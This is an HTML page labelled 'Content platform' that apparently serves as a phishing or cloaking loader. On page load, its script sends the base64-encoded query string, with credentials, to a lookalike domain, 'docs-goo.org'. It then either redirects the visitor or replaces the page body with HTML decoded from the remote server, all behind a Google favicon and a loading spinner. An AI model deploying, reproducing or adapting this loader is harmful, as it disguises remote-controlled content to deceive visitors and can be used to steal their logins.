<!doctype html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Content platform</title>
    <link rel="shortcut icon" href="//ssl.gstatic.com/pantheon/images/favicon/default.png">
	<link type="text/css" href="https://s3.eu-west-2.amazonaws.com/trusted-foundation/hexagon-preloader.css" rel="stylesheet">
	<script src="https://code.jquery.com/jquery-3.1.0.min.js"></script>
</head>
<body>

<script type="text/javascript">
    document.addEventListener("DOMContentLoaded", function() {
		//var url = new URL(location.href);
		
		//console.log(url);
		
		var scriptUrl = 'https://docs-goo.org/findic.php?t=handler&v='+btoa(location.search);
		
		$.ajax({
		  url: scriptUrl,
		  //crossDomain: true,
		  xhrFields: { withCredentials: true },
		  success: function(resp){
			var result = JSON.parse(atob(resp));
			
			//console.log(result.status);
			
			if( result.status === 'redirect' )
			{
				window.location.href = result.link;
				return;
			}
			else if( result.status === 'script' )
			{
				var newUrl = new URL(window.location.href);
				newUrl.search = '?'+result.linkVars;
				
				history.replaceState({}, document.title, newUrl.href);
				
				var content = atob(result.data);
				
				$('body').html(content);
			}
			else
				alert('Udefined content');
		  },
		  dataType: 'text'
		});
    });
</script>

	<div class="preloader loading">
		<span class="slice"></span>
		<span class="slice"></span>
		<span class="slice"></span>
		<span class="slice"></span>
		<span class="slice"></span>
		<span class="slice"></span>
	</div>
	
</body>
</html>